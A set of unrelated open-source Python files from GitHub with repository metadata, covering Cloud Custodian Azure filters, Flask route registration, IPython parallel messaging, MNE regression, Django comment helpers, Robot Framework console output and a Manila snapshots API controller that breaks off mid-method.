**{
'mode': {'enum': ['include', 'equal', 'any', 'only']},
'list': {'type': 'array', 'items': {'enum': values}}
})
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallBypassFilter, self).__init__(data, manager)
self.mode = self.data['mode']
self.list = set(self.data['list'])
self.client = None
def process(self, resources, event=None):
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_bypass(self, resource):
"""
Queries firewall rules for a resource. Override in concrete classes.
:param resource:
:return: A set of netaddr.IPSet with rules defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
bypass_set = set(self._query_bypass(resource))
ok = self._check_bypass(bypass_set)
return ok
def _check_bypass(self, bypass_set):
if self.mode == 'equal':
return self.list == bypass_set
elif self.mode == 'include':
return self.list.issubset(bypass_set)
elif self.mode == 'any':
return not self.list.isdisjoint(bypass_set)
elif self.mode == 'only':
return bypass_set.issubset(self.list)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
class ResourceLockFilter(Filter):
"""
Filter locked resources.
Lock can be of 2 types: ReadOnly and CanNotDelete. To filter any lock, use "Any" type.
Lock type is optional, by default any lock will be applied to the filter.
To get unlocked resources, use "Absent" type.
:example:
Get all keyvaults with ReadOnly lock:
.. code-block :: yaml
policies:
- name: locked-keyvaults
resource: azure.keyvault
filters:
- type: resource-lock
lock-type: ReadOnly
:example:
Get all locked sqldatabases (any type of lock):
.. code-block :: yaml
policies:
- name: locked-sqldatabases
resource: azure.sqldatabase
filters:
- type: resource-lock
:example:
Get all unlocked resource groups:
.. code-block :: yaml
policies:
- name: unlock-rgs
resource: azure.resourcegroup
filters:
- type: resource-lock
lock-type: Absent
"""
schema = type_schema(
'resource-lock', required=['type'],
**{
'lock-type': {'enum': ['ReadOnly', 'CanNotDelete', 'Any', 'Absent']},
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.ResourceLockFilter')
def __init__(self, data, manager=None):
super(ResourceLockFilter, self).__init__(data, manager)
self.lock_type = self.data.get('lock-type', 'Any')
def process(self, resources, event=None):
resources, exceptions = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._process_resource_set,
executor_factory=self.executor_factory,
log=self.log
)
if exceptions:
raise exceptions[0]
return resources
def _process_resource_set(self, resources, event=None):
client = self.manager.get_client('azure.mgmt.resource.locks.ManagementLockClient')
result = []
for resource in resources:
if is_resource_group(resource):
locks = [r.serialize(True) for r in
client.management_locks.list_at_resource_group_level(
resource['name'])]
else:
locks = [r.serialize(True) for r in client.management_locks.list_at_resource_level(
resource['resourceGroup'],
ResourceIdParser.get_namespace(resource['id']),
ResourceIdParser.get_resource_name(resource.get('c7n:parent-id')) or '',
ResourceIdParser.get_resource_type(resource['id']),
resource['name'])]
if StringUtils.equal('Absent', self.lock_type) and not locks:
result.append(resource)
else:
for lock in locks:
if StringUtils.equal('Any', self.lock_type) or \
StringUtils.equal(lock['properties']['level'], self.lock_type):
result.append(resource)
break
return result
class CostFilter(ValueFilter):
"""
Filter resources by the cost consumed over a timeframe.
Total cost for the resource includes costs for all of it child resources if billed
separately (e.g. SQL Server and SQL Server Databases). Warning message is logged if we detect
different currencies.
Timeframe options:
- Number of days before today
- All days in current calendar period until today:
- ``WeekToDate``
- ``MonthToDate``
- ``YearToDate``
- All days in the previous calendar period:
- ``TheLastWeek``
- ``TheLastMonth``
- ``TheLastYear``
:examples:
SQL servers that were cost more than 2000 in the last month.
.. code-block:: yaml
policies:
- name: expensive-sql-servers-last-month
resource: azure.sqlserver
filters:
- type: cost
timeframe: TheLastMonth
op: gt
value: 2000
SQL servers that were cost more than 2000 in the last 30 days not including today.
.. code-block:: yaml
policies:
- name: expensive-sql-servers
resource: azure.sqlserver
filters:
- type: cost
timeframe: 30
op: gt
value: 2000
"""
preset_timeframes = [i.value for i in TimeframeType if i.value != 'Custom']
schema = type_schema('cost',
rinherit=ValueFilter.schema,
required=['timeframe'],
key=None,
**{
'timeframe': {
'oneOf': [
{'enum': preset_timeframes},
{"type": "number", "minimum": 1}
]
}
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.CostFilter')
def __init__(self, data, manager=None):
data['key'] = 'PreTaxCost' # can also be Currency, but now only PreTaxCost is supported
super(CostFilter, self).__init__(data, manager)
self.cached_costs = None
def __call__(self, i):
if not self.cached_costs:
self.cached_costs = self._query_costs()
id = i['id'].lower() + "/"
costs = [k.copy() for k in self.cached_costs if (k['ResourceId'] + '/').startswith(id)]
if not costs:
return False
if any(c['Currency'] != costs[0]['Currency'] for c in costs):
self.log.warning('Detected different currencies for the resource {0}. Costs array: {1}'
.format(i['id'], costs))
total_cost = {
'PreTaxCost': sum(c['PreTaxCost'] for c in costs),
'Currency': costs[0]['Currency']
}
i[get_annotation_prefix('cost')] = total_cost
result = super(CostFilter, self).__call__(total_cost)
return result
def fix_wrap_rest_response(self, data):
"""
Azure REST API doesn't match the documentation and the python SDK fails to deserialize
the response.
This is a temporal workaround that converts the response into the correct form.
:param data: partially deserialized response that doesn't match the the spec.
:return: partially deserialized response that does match the the spec.
"""
type = data.get('type', None)
if type != 'Microsoft.CostManagement/query':
return data
data['value'] = [data]
data['nextLink'] = data['properties']['nextLink']
return data
def _query_costs(self):
manager = self.manager
is_resource_group = manager.type == 'resourcegroup'
client = manager.get_client('azure.mgmt.costmanagement.CostManagementClient')
aggregation = {'totalCost': QueryAggregation(name='PreTaxCost')}
grouping = [QueryGrouping(type='Dimension',
name='ResourceGroupName' if is_resource_group else 'ResourceId')]
query_filter = None
if not is_resource_group:
query_filter = QueryFilter(
dimension=QueryComparisonExpression(name='ResourceType',
operator='In',
values=[manager.resource_type.resource_type]))
if 'dimension' in query_filter._attribute_map:
query_filter._attribute_map['dimension']['key'] = 'dimensions'
dataset = QueryDataset(grouping=grouping, aggregation=aggregation, filter=query_filter)
timeframe = self.data['timeframe']
time_period = None
if timeframe not in CostFilter.preset_timeframes:
end_time = utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
start_time = end_time - timedelta(days=timeframe)
timeframe = 'Custom'
time_period = QueryTimePeriod(from_property=start_time, to=end_time)
definition = QueryDefinition(timeframe=timeframe, time_period=time_period, dataset=dataset)
subscription_id = manager.get_session().get_subscription_id()
scope = '/subscriptions/' + subscription_id
query = client.query.usage_by_scope(scope, definition)
if hasattr(query, '_derserializer'):
original = query._derserializer._deserialize
query._derserializer._deserialize = lambda target, data: \
original(target, self.fix_wrap_rest_response(data))
result_list = list(query)[0]
result_list = [{result_list.columns[i].name: v for i, v in enumerate(row)}
for row in result_list.rows]
for r in result_list:
if 'ResourceGroupName' in r:
r['ResourceId'] = scope + '/resourcegroups/' + r.pop('ResourceGroupName')
r['ResourceId'] = r['ResourceId'].lower()
return result_list
class ParentFilter(Filter):
"""
Meta filter that allows you to filter child resources by applying filters to their
parent resources.
You can use any filter supported by corresponding parent resource type.
:examples:
Find Azure KeyVault Keys from Key Vaults with ``owner:ProjectA`` tag.
.. code-block:: yaml
policies:
- name: kv-keys-from-tagged-keyvaults
resource: azure.keyvault-key
filters:
- type: parent
filter:
type: value
key: tags.owner
value: ProjectA
"""
schema = type_schema(
'parent', filter={'type': 'object'}, required=['type'])
schema_alias = True
def __init__(self, data, manager=None):
super(ParentFilter, self).__init__(data, manager)
self.parent_manager = self.manager.get_parent_manager()
self.parent_filter = self.parent_manager.filter_registry.factory(
self.data['filter'],
self.parent_manager)
def process(self, resources, event=None):
parent_resources = self.parent_filter.process(self.parent_manager.resources())
parent_resources_ids = [p['id'] for p in parent_resources]
parent_key = self.manager.resource_type.parent_key
return [r for r in resources if r[parent_key] in parent_resources_ids]
| {
"content_hash": "608b43f6f0e3abaaf25d9ded598d2eb6",
"timestamp": "",
"source": "github",
"line_count": 1011,
"max_line_length": 103,
"avg_line_length": 34.44015825914936,
"alnum_prop": 0.582268301789253,
"repo_name": "Sutto/cloud-custodian",
"id": "ac25259cd7340f2f8478a12b051fd056fee988ad",
"size": "35409",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/c7n_azure/c7n_azure/filters.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7986"
},
{
"name": "Go",
"bytes": "146630"
},
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "9971"
},
{
"name": "PowerShell",
"bytes": "1804"
},
{
"name": "Python",
"bytes": "5283859"
},
{
"name": "Shell",
"bytes": "12627"
},
{
"name": "Smarty",
"bytes": "359"
}
],
"symlink_target": ""
} |
import logging
import logging.handlers
import logging.config
#from maboss import config
log = logging.getLogger(__name__)
from .lazy_view import LazyView
#function view
def url(app, url_rule, import_name, **options):
view = LazyView('maboss.' + import_name)
app.add_url_rule(url_rule, view_func=view, **options)
#restful function view
def register_rest(app, url_base, import_name, pk='id', pk_type='int'):
log.debug("=="*20)
log.debug(import_name)
#get
url_rule = url_base
view = LazyView('maboss.' + import_name+'.get')
log.debug(view)
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'GET',])
#post
url_rule = url_base
view = LazyView('maboss.' + import_name+'.post')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'POST'])
#get
url_rule ='%s<%s:%s>' % (url_base, pk_type, pk)
view = LazyView('maboss.' + import_name+'.get')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'GET',])
#put
url_rule = '%s<%s:%s>' % (url_base, pk_type, pk)
view = LazyView('maboss.' + import_name+'.put')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'PUT'])
#delete
url_rule ='%s<%s:%s>' % (url_base, pk_type, pk)
view = LazyView('maboss.' + import_name+'.delete')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'DELETE'])
#class view
def register_api(app, view, endpoint, url, pk='id', pk_type='int'):
view_func = view.as_view(endpoint)
app.add_url_rule(url, defaults={pk: None}, view_func=view_func, methods=['GET',])
app.add_url_rule(url, view_func=view_func, methods=['POST',])
app.add_url_rule('%s<%s:%s>' % (url, pk_type, pk), view_func=view_func, methods=['GET', 'PUT', 'DELETE'])
| {
"content_hash": "07f58a9933aa88e39b778a26a63671e4",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 109,
"avg_line_length": 30.716666666666665,
"alnum_prop": 0.6044492674986435,
"repo_name": "mabotech/maboss.py",
"id": "7cad9d40128644d7121cd1fe8cb8cf3eae6a1709",
"size": "1843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "maboss/webx/helpers/register.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "14864"
},
{
"name": "JavaScript",
"bytes": "4950"
},
{
"name": "Lua",
"bytes": "683"
},
{
"name": "Python",
"bytes": "433923"
},
{
"name": "Shell",
"bytes": "667"
}
],
"symlink_target": ""
} |
import sys
from IPython.parallel import Client
rc = Client()
rc.block=True
view = rc[:]
view.run('communicator.py')
view.execute('com = EngineCommunicator()')
# gather the connection information into a dict
ar = view.apply_async(lambda : com.info)
peers = ar.get_dict()
# this is a dict, keyed by engine ID, of the connection info for the EngineCommunicators
# connect the engines to each other:
view.apply_sync(lambda pdict: com.connect(pdict), peers)
# now all the engines are connected, and we can communicate between them:
def broadcast(client, sender, msg_name, dest_name=None, block=None):
"""broadcast a message from one engine to all others."""
dest_name = msg_name if dest_name is None else dest_name
client[sender].execute('com.publish(%s)'%msg_name, block=None)
targets = client.ids
targets.remove(sender)
return client[targets].execute('%s=com.consume()'%dest_name, block=None)
def send(client, sender, targets, msg_name, dest_name=None, block=None):
"""send a message from one to one-or-more engines."""
dest_name = msg_name if dest_name is None else dest_name
def _send(targets, m_name):
msg = globals()[m_name]
return com.send(targets, msg)
client[sender].apply_async(_send, targets, msg_name)
return client[targets].execute('%s=com.recv()'%dest_name, block=None)
| {
"content_hash": "da6e9e953e77d7d24549bcc26b37b6b3",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 88,
"avg_line_length": 31.74418604651163,
"alnum_prop": 0.6981684981684981,
"repo_name": "OSGeo-live/CesiumWidget",
"id": "865c80230e184282d0c24b284956406b193bdd78",
"size": "1365",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "GSOC/notebooks/ipython/examples/Parallel Computing/interengine/interengine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1268717"
},
{
"name": "Erlang",
"bytes": "4368"
},
{
"name": "GLSL",
"bytes": "318955"
},
{
"name": "HTML",
"bytes": "2739012"
},
{
"name": "JavaScript",
"bytes": "65112753"
},
{
"name": "Jupyter Notebook",
"bytes": "6255280"
},
{
"name": "Python",
"bytes": "308164"
},
{
"name": "Shell",
"bytes": "6212"
},
{
"name": "Smarty",
"bytes": "457"
}
],
"symlink_target": ""
} |
"""
========================================
Regression on continuous data (rER[P/F])
========================================
This demonstrates how rER[P/F]s - regressing the continuous data - is a
generalisation of traditional averaging. If all preprocessing steps
are the same, no overlap between epochs exists, and if all
predictors are binary, regression is virtually identical to traditional
averaging.
If overlap exists and/or predictors are continuous, traditional averaging
is inapplicable, but regression can estimate effects, including those of
continuous predictors.
rERPs are described in:
Smith, N. J., & Kutas, M. (2015). Regression-based estimation of ERP
waveforms: II. Non-linear effects, overlap correction, and practical
considerations. Psychophysiology, 52(2), 169-189.
"""
# Authors: Jona Sassenhagen <[email protected]>
#
# License: BSD (3-clause)
import matplotlib.pyplot as plt
import mne
from mne.datasets import sample
from mne.stats.regression import linear_regression_raw
# Load and preprocess data
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
raw = mne.io.read_raw_fif(raw_fname, preload=True).pick_types(
meg='grad', stim=True, eeg=False).filter(1, None) # high-pass
# Set up events
events = mne.find_events(raw)
event_id = {'Aud/L': 1, 'Aud/R': 2}
tmin, tmax = -.1, .5
# regular epoching
picks = mne.pick_types(raw.info, meg=True)
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, reject=None,
baseline=None, preload=True, verbose=False)
# rERF
evokeds = linear_regression_raw(raw, events=events, event_id=event_id,
reject=None, tmin=tmin, tmax=tmax)
# linear_regression_raw returns a dict of evokeds
# select conditions similarly to mne.Epochs objects
# plot both results, and their difference
cond = "Aud/L"
fig, (ax1, ax2, ax3) = plt.subplots(3, 1)
params = dict(spatial_colors=True, show=False, ylim=dict(grad=(-200, 200)))
epochs[cond].average().plot(axes=ax1, **params)
evokeds[cond].plot(axes=ax2, **params)
contrast = mne.combine_evoked([evokeds[cond], -epochs[cond].average()],
weights='equal')
contrast.plot(axes=ax3, **params)
ax1.set_title("Traditional averaging")
ax2.set_title("rERF")
ax3.set_title("Difference")
plt.show()
| {
"content_hash": "d28e460f15b0aafb47b9d3551a29431a",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 75,
"avg_line_length": 36.484375,
"alnum_prop": 0.6946466809421842,
"repo_name": "mne-tools/mne-tools.github.io",
"id": "ec3398ad205709cf368b2c939724265f4977c1b8",
"size": "2335",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "0.14/_downloads/plot_linear_regression_raw.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "708696"
},
{
"name": "Dockerfile",
"bytes": "1820"
},
{
"name": "HTML",
"bytes": "1526247783"
},
{
"name": "JavaScript",
"bytes": "1323087"
},
{
"name": "Jupyter Notebook",
"bytes": "24820047"
},
{
"name": "Python",
"bytes": "18575494"
}
],
"symlink_target": ""
} |
"""
A few bits of helper functions for comment views.
"""
import textwrap
try:
from urllib.parse import urlencode
except ImportError: # Python 2
from urllib import urlencode
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, resolve_url
from django.template import RequestContext
from django.core.exceptions import ObjectDoesNotExist
from django.contrib import comments
from django.utils.http import is_safe_url
def next_redirect(request, fallback, **get_kwargs):
"""
Handle the "where should I go next?" part of comment views.
The next value could be a
``?next=...`` GET arg or the URL of a given view (``fallback``). See
the view modules for examples.
Returns an ``HttpResponseRedirect``.
"""
next = request.POST.get('next')
if not is_safe_url(url=next, host=request.get_host()):
next = resolve_url(fallback)
if get_kwargs:
if '#' in next:
tmp = next.rsplit('#', 1)
next = tmp[0]
anchor = '#' + tmp[1]
else:
anchor = ''
joiner = '&' if '?' in next else '?'
next += joiner + urlencode(get_kwargs) + anchor
return HttpResponseRedirect(next)
def confirmation_view(template, doc="Display a confirmation view."):
"""
Confirmation view generator for the "comment was
posted/flagged/deleted/approved" views.
"""
def confirmed(request):
comment = None
if 'c' in request.GET:
try:
comment = comments.get_model().objects.get(pk=request.GET['c'])
except (ObjectDoesNotExist, ValueError):
pass
return render_to_response(template,
{'comment': comment},
context_instance=RequestContext(request)
)
confirmed.__doc__ = textwrap.dedent("""\
%s
Templates: :template:`%s``
Context:
comment
The posted comment
""" % (doc, template)
)
return confirmed
| {
"content_hash": "16d23bc3fe7da25ae5ff32a05ed05077",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 79,
"avg_line_length": 29.057142857142857,
"alnum_prop": 0.6116027531956736,
"repo_name": "mdj2/django",
"id": "da70272282ec403492dabf50d81b4cd6d801aaa3",
"size": "2034",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "django/contrib/comments/views/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "50948"
},
{
"name": "JavaScript",
"bytes": "98169"
},
{
"name": "Python",
"bytes": "8406598"
},
{
"name": "Shell",
"bytes": "12135"
}
],
"symlink_target": ""
} |
import datetime
from taskbuffer.DBProxy import DBProxy
import userinterface.Client as Client
# password
from config import panda_config
passwd = panda_config.dbpasswd
# time limit
timeLimit = datetime.datetime.utcnow() - datetime.timedelta(days=1)
# instantiate DB proxies
proxyS = DBProxy()
proxyS.connect('adbpro.usatlas.bnl.gov',passwd,'panda-developer','PandaDevDB')
# get PandaIDs from jobsDefined
res = proxyS.querySQL("SELECT PandaID,modificationTime from jobsDefined4 ORDER BY modificationTime")
# kill f old
jobs=[]
for (id,modTime) in res:
if modTime < timeLimit:
jobs.append(id)
Client.killJobs(jobs)
| {
"content_hash": "6f9f3b3db2cdb6ac6b1abcd897a07914",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 100,
"avg_line_length": 24.26923076923077,
"alnum_prop": 0.7702060221870047,
"repo_name": "RRCKI/panda-server",
"id": "a646ea2028a7c7c62cdf538ac36b24981f435d6d",
"size": "631",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pandaserver/test/killDefJobs.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "PLSQL",
"bytes": "23194"
},
{
"name": "Python",
"bytes": "2670522"
},
{
"name": "Shell",
"bytes": "16124"
}
],
"symlink_target": ""
} |
import os
WATARU_BASE_DIR_PATH = os.path.abspath(os.path.dirname(__file__))
| {
"content_hash": "a0c35308ac480471185812a39f2aad2b",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 65,
"avg_line_length": 25.666666666666668,
"alnum_prop": 0.7142857142857143,
"repo_name": "risuoku/wataru",
"id": "cafc26777458f817863759d2ad2e4a9d0c158541",
"size": "77",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wataru/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "58649"
},
{
"name": "Shell",
"bytes": "216"
},
{
"name": "Smarty",
"bytes": "1910"
}
],
"symlink_target": ""
} |
import sys
from robot import utils
from .highlighting import AnsiHighlighter, Highlighter, NoHighlighting
from .loggerhelper import IsLogged
class CommandLineMonitor(object):
def __init__(self, width=78, colors='AUTO', markers='AUTO', stdout=None,
stderr=None):
self._writer = CommandLineWriter(width, colors, markers, stdout, stderr)
self._is_logged = IsLogged('WARN')
self._started = False
self._started_keywords = 0
self._running_test = False
def start_suite(self, suite):
if not self._started:
self._writer.suite_separator()
self._started = True
self._writer.info(suite.longname, suite.doc, start_suite=True)
self._writer.suite_separator()
def end_suite(self, suite):
self._writer.info(suite.longname, suite.doc)
self._writer.status(suite.status)
self._writer.message(suite.get_full_message())
self._writer.suite_separator()
def start_test(self, test):
self._writer.info(test.name, test.doc)
self._running_test = True
def end_test(self, test):
self._writer.status(test.status, clear=True)
self._writer.message(test.message)
self._writer.test_separator()
self._running_test = False
def start_keyword(self, kw):
self._started_keywords += 1
def end_keyword(self, kw):
self._started_keywords -= 1
if self._running_test and not self._started_keywords:
self._writer.keyword_marker(kw)
def message(self, msg):
if self._is_logged(msg.level):
self._writer.error(msg.message, msg.level, clear=self._running_test)
def output_file(self, name, path):
self._writer.output(name, path)
class CommandLineWriter(object):
_status_length = len('| PASS |')
def __init__(self, width=78, colors='AUTO', markers='AUTO', stdout=None,
stderr=None):
self._width = width
self._stdout = stdout or sys.__stdout__
self._stderr = stderr or sys.__stderr__
self._highlighter = StatusHighlighter(colors, self._stdout, self._stderr)
self._keyword_marker = KeywordMarker(markers, self._stdout, self._highlighter)
self._last_info = None
def info(self, name, doc, start_suite=False):
width, separator = self._get_info_width_and_separator(start_suite)
self._last_info = self._get_info(name, doc, width) + separator
self._write(self._last_info, newline=False)
self._keyword_marker.reset_count()
def _get_info_width_and_separator(self, start_suite):
if start_suite:
return self._width, '\n'
return self._width - self._status_length - 1, ' '
def _get_info(self, name, doc, width):
if utils.get_console_length(name) > width:
return utils.pad_console_length(name, width)
info = name if not doc else '%s :: %s' % (name, doc.splitlines()[0])
return utils.pad_console_length(info, width)
def suite_separator(self):
self._fill('=')
def test_separator(self):
self._fill('-')
def _fill(self, char):
self._write(char * self._width)
def status(self, status, clear=False):
if self._should_clear_markers(clear):
self._clear_status()
self._highlight('| ', status, ' |')
def _should_clear_markers(self, clear):
return clear and self._keyword_marker.marking_enabled
def _clear_status(self):
self._clear_info_line()
self._rewrite_info()
def _clear_info_line(self):
self._write('\r' + ' ' * self._width + '\r', newline=False)
self._keyword_marker.reset_count()
def _rewrite_info(self):
self._write(self._last_info, newline=False)
def message(self, message):
if message:
self._write(message.strip())
def keyword_marker(self, kw):
if self._keyword_marker.marker_count == self._status_length:
self._clear_status()
self._keyword_marker.reset_count()
self._keyword_marker.mark(kw)
def error(self, message, level, clear=False):
if self._should_clear_markers(clear):
self._clear_info_line()
self._highlight('[ ', level, ' ] ' + message, error=True)
if self._should_clear_markers(clear):
self._rewrite_info()
def output(self, name, path):
self._write('%-8s %s' % (name+':', path))
def _write(self, text, newline=True, error=False):
stream = self._stdout if not error else self._stderr
if newline:
text += '\n'
stream.write(utils.encode_output(text))
stream.flush()
def _highlight(self, before, status, after, newline=True, error=False):
stream = self._stdout if not error else self._stderr
self._write(before, newline=False, error=error)
self._highlighter.highlight_status(status, stream)
self._write(after, newline=newline, error=error)
class StatusHighlighter(object):
def __init__(self, colors, *streams):
self._highlighters = dict((stream, self._get_highlighter(stream, colors))
for stream in streams)
def _get_highlighter(self, stream, colors):
auto = Highlighter if utils.isatty(stream) else NoHighlighting
highlighter = {'AUTO': auto,
'ON': Highlighter,
'FORCE': Highlighter, # compatibility with 2.5.5 and earlier
'OFF': NoHighlighting,
'ANSI': AnsiHighlighter}.get(colors.upper(), auto)
return highlighter(stream)
def highlight_status(self, status, stream):
highlighter = self._start_status_highlighting(status, stream)
stream.write(status)
highlighter.reset()
def _start_status_highlighting(self, status, stream):
highlighter = self._highlighters[stream]
{'PASS': highlighter.green,
'FAIL': highlighter.red,
'ERROR': highlighter.red,
'WARN': highlighter.yellow}[status]()
return highlighter
def highlight(self, text, color, stream):
highlighter = self._highlighters[stream]
getattr(highlighter, color)()
stream.write(text)
stream.flush()
highlighter.reset()
class KeywordMarker(object):
def __init__(self, markers, stdout, highlighter):
self._stdout = stdout
self._highlighter = highlighter
self.marking_enabled = self._marking_enabled(markers, stdout)
self.marker_count = 0
def _marking_enabled(self, markers, stdout):
auto = utils.isatty(stdout)
return {'AUTO': auto,
'ON': True,
'OFF': False}.get(markers.upper(), auto)
def mark(self, kw):
if self.marking_enabled:
marker, color = ('.', 'green') if kw.passed else ('F', 'red')
self._highlighter.highlight(marker, color, self._stdout)
self.marker_count += 1
def reset_count(self):
self.marker_count = 0
| {
"content_hash": "0c41a8c6c86ba25ddfb3f9524e9057f3",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 86,
"avg_line_length": 34.32367149758454,
"alnum_prop": 0.6015482054890922,
"repo_name": "qitaos/robotframework-mabot",
"id": "174dfd255b6221d2b7c0cd77c647e9d944d7712a",
"size": "7711",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "lib/robot/output/monitor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "11560"
},
{
"name": "HTML",
"bytes": "84841"
},
{
"name": "JavaScript",
"bytes": "38214"
},
{
"name": "Python",
"bytes": "1288243"
},
{
"name": "Shell",
"bytes": "32"
}
],
"symlink_target": ""
} |
import optparse
import subprocess
from kindled.controllers import DefaultController
def bootstrap():
""" Command Line Bootstrap Function """
usage = "%prog or type %prog -h (--help) for help"
description = "Kindled"
version = "v0.1"
parser = optparse.OptionParser(usage=usage, description=description, version=version)
parser.add_option("-v",
action="count",
dest="verbosity",
default=3,
help="Verbosity. Add more -v to be more verbose (%s)")
parser.add_option("-z",
"--logfile",
dest="logfile",
default=None,
help="Log to file instead of console")
parser.add_option("-f",
"--force",
dest="force",
action="store_true",
default=False,
help="Force generation of content, ignoring cached content")
parser.add_option("-t",
"--test",
dest="test",
action="store_true",
default=False,
help="Perform test run (disables email sending)")
parser.add_option("-d",
"--debug",
dest="debug",
action="store_true",
default=False,
help="Run in debug mode (outputs Calibre messages)")
(options, args) = parser.parse_args()
controller = DefaultController(options=options, args=args)
controller.execute()
def simple_shell(args, stdout=False):
""" Simple Subprocess Shell Helper Function """
if stdout:
rc = subprocess.call(args, shell=False)
else:
rc = subprocess.call(args, shell=False, stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT)
return rc
| {
"content_hash": "963d32bb0c8da8b0707cae312339a949",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 103,
"avg_line_length": 30.796875,
"alnum_prop": 0.49670218163368846,
"repo_name": "jinglemansweep/Kindled",
"id": "d37cc4db7ca9252a79080747932b3810bde1fabc",
"size": "1971",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kindled/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25116"
}
],
"symlink_target": ""
} |
"""The share snapshots api."""
from oslo_log import log
import six
import webob
from webob import exc
from manila.api import common
from manila.api.openstack import wsgi
from manila.api.views import share_snapshots as snapshot_views
from manila import exception
from manila.i18n import _, _LI
from manila import share
LOG = log.getLogger(__name__)
class ShareSnapshotsController(wsgi.Controller):
"""The Share Snapshots API controller for the OpenStack API."""
_view_builder_class = snapshot_views.ViewBuilder
def __init__(self):
super(ShareSnapshotsController, self).__init__()
self.share_api = share.API()
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['manila.context']
try:
snapshot = self.share_api.get_snapshot(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return self._view_builder.detail(req, snapshot)
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['manila.context']
LOG.info(_LI("Delete snapshot with id: %s"), id, context=context)
try:
snapshot = self.share_api.get_snapshot(context, id)
self.share_api.delete_snapshot(context, snapshot)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._get_snapshots(req, is_detail=False)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._get_snapshots(req, is_detail=True)
def _get_snapshots(self, req, is_detail):
"""Returns a list of snapshots."""
context = req.environ['manila.context']
search_opts = {}
search_opts.update(req.GET)
# Remove keys that are not related to share attrs
search_opts.pop('limit', None)
search_opts.pop('offset', None)
sort_key = search_opts.pop('sort_key', 'created_at')
sort_dir = search_opts.pop('sort_dir', 'desc')
# NOTE(vponomaryov): Manila stores in DB key 'display_name', but
# allows to use both keys 'name' and 'display_name'. It is leftover
# from Cinder v1 and v2 APIs.
if 'name' in search_opts:
search_opts['display_name'] = search_opts.pop('name')
common.remove_invalid_options(context, search_opts,
self._get_snapshots_search_options())
snapshots = self.share_api.get_all_snapshots(
context,
search_opts=search_opts,
sort_key=sort_key,
sort_dir=sort_dir,
)
limited_list = common.limited(snapshots, req)
if is_detail:
snapshots = self._view_builder.detail_list(req, limited_list)
else:
snapshots = self._view_builder.summary_list(req, limited_list)
return snapshots
def _get_snapshots_search_options(self):
"""Return share search options allowed by non-admin."""
return ('display_name', 'name', 'status', 'share_id', 'size')
def update(self, req, id, body):
"""Update a snapshot."""
context = req.environ['manila.context']
if not body or 'snapshot' not in body:
raise exc.HTTPUnprocessableEntity()
snapshot_data = body['snapshot']
valid_update_keys = (
'display_name',
'display_description',
)
update_dict = dict([(key, snapshot_data[key])
for key in valid_update_keys
if key in snapshot_data])
try:
snapshot = self.share_api.get_snapshot(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
snapshot = self.share_api.snapshot_update(context, snapshot,
update_dict)
snapshot.update(update_dict)
return self._view_builder.detail(req, snapshot)
@wsgi.response(202)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['manila.context']
if not self.is_valid_body(body, 'snapshot'):
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
share_id = snapshot['share_id']
